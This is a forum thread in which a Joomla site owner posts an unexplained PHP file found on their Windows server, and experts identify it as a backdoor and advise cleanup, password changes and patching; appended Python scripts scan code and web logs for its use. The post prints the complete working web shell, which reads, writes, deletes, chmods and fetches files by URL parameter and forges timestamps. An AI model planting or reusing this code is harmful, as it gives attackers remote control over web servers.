Solved

strange file suddenly appeared

Posted on 2013-12-14
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP that I'm not entirely sure what it's all supposed to be doing or what its origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but WordPress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>



Any ideas?

Thanks
Question by:billium99
 
LVL 30

Expert Comment

by:Marco Gasi
ID: 39718988
I only took a look, but if I were you I would immediately back up those files on my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions, deletes files and these are things only you should do: if you're not sure about it, don't trust it.

I don't know Joomla, but I doubt any framework can create such files: I repeat, copy them to an inoffensive location and delete them from the server, then talk with the host provider.
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
 
LVL 30

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the php command to delete files.
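A defender-side triage script, added here as an illustration and not part of the thread: it scans PHP source for the pattern Marco points at, request parameters ($_GET and friends) flowing into chmod, unlink, file_put_contents and similar calls, and reports the line numbers. The sample source is constructed to resemble the posted file; the regexes and the simple variable-taint tracking are my own. Because the posted atouch() copies index.php's modification time onto new files, sorting the web root by mtime is unreliable, so a content scan like this is the more dependable check.

```python
import os
import re

# Filesystem calls the posted wp-sto.php drives from request parameters.
SINKS = re.compile(r"\b(file_put_contents|file_get_contents|unlink|chmod|mkdir|rmdir|fopen|touch)\s*\(")
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ASSIGN_FROM_REQUEST = re.compile(r"(\$\w+)\s*=\s*\$_(GET|POST|REQUEST|COOKIE)\b")
VAR = re.compile(r"\$\w+")

def triage_php(source):
    """Return [(line_no, sink, how)] for sinks fed by request data, directly or via a variable."""
    tainted = {}      # "$name" -> line where it was first read from the request
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in ASSIGN_FROM_REQUEST.finditer(line):
            tainted.setdefault(m.group(1), n)
        for s in SINKS.finditer(line):
            args = line[s.end():]
            if SUPERGLOBAL.search(args):
                findings.append((n, s.group(1), "request data passed directly"))
                continue
            used = [v for v in VAR.findall(args) if v in tainted]
            if used:
                findings.append((n, s.group(1),
                                 f"{used[0]} set from request on line {tainted[used[0]]}"))
    return findings

def scan_tree(root):
    """Run triage_php over every .php file under root; returns {path: findings}."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = triage_php(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample in the style of the posted file (not the full shell).
SAMPLE = r'''<?
$f_del_name=$_GET['f_del_name'];
$chmod_name=$_GET['chmod_name'];
if (isset($_GET['del'])) { unlink($_GET['del']); die();}
if ($f_del_name) { unlink ("$f_del_name.php"); }
if ($chmod_name) { chmod ("$chmod_name.php", 0777); }
$cfg = file_get_contents(__DIR__ . "/configuration.php");
?>'''
```

Run scan_tree() against a copy of the web root; the last SAMPLE line shows that a fixed-path read is not reported, only request-controlled paths are.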
 
LVL 82

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
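Since everything the file does is driven by the URL, the web server log shows what was actually done through it. This added Python example (mine, not from the thread) reads an IIS W3C log, the format the asker's Windows 2008 server would write, and maps the query parameters of every request to wp-sto.php back to the action the posted code performs for them. The log lines are constructed with documentation IP ranges; the field subset is an assumption, the parser takes column names from the #Fields: header so a real log with more columns works the same way.

```python
from urllib.parse import parse_qs

# Query parameters the posted wp-sto.php reacts to, and what each one does.
ACTIONS = {
    "sc": "dump own source", "scmd5": "hash own source",
    "flag_sum": "liveness check", "read": "read file", "write": "write file",
    "del": "delete file", "f_del_name": "delete file",
    "f_creat_url": "fetch URL and write it to a file",
    "chmod_name": "chmod", "folder_creat_name": "mkdir 0777",
    "folder_del_name": "recursive directory delete",
    "tfilet": "copy index.php timestamp onto a file",
}

def parse_w3c(log_text):
    """Yield one dict per request; column names come from the #Fields: header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def shell_requests(log_text, shell="wp-sto.php"):
    """Return the requests that hit the shell, with the actions they triggered."""
    hits = []
    for r in parse_w3c(log_text):
        if not r.get("cs-uri-stem", "").lower().endswith("/" + shell):
            continue
        q = parse_qs(r.get("cs-uri-query", ""), keep_blank_values=True)
        hits.append({
            "time": f"{r.get('date')} {r.get('time')}",
            "client": r.get("c-ip"),
            "actions": [ACTIONS[k] for k in q if k in ACTIONS],
            "targets": {k: v[0] for k, v in q.items() if k in ACTIONS},
        })
    return hits

# Constructed sample log (documentation IP ranges, subset of IIS fields).
LOG = """#Software: Microsoft Internet Information Services 7.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2013-12-10 03:14:07 10.0.0.5 GET /wp-sto.php sc=1 80 203.0.113.9 200
2013-12-10 03:14:21 10.0.0.5 GET /wp-sto.php read=configuration.php 80 203.0.113.9 200
2013-12-10 03:15:02 10.0.0.5 GET /index.php option=com_content 80 198.51.100.7 200
2013-12-10 03:16:45 10.0.0.5 GET /wp-sto.php folder_creat_name=tmp_upl 80 203.0.113.9 200
"""
```

The client addresses and timestamps that come out are the starting point for checking the rest of the log (and the Joomla admin log) for how the file got there in the first place.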
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
 
LVL 30

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand what exactly it does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file passing it some parameters and do something bad like delete your files, even empty whole directories...

Change all passwords and provide security to your dedicated server, because it has been violated. I'm sorry.
 
LVL 34

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
 
LVL 108

Accepted Solution

by:Ray Paseur
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks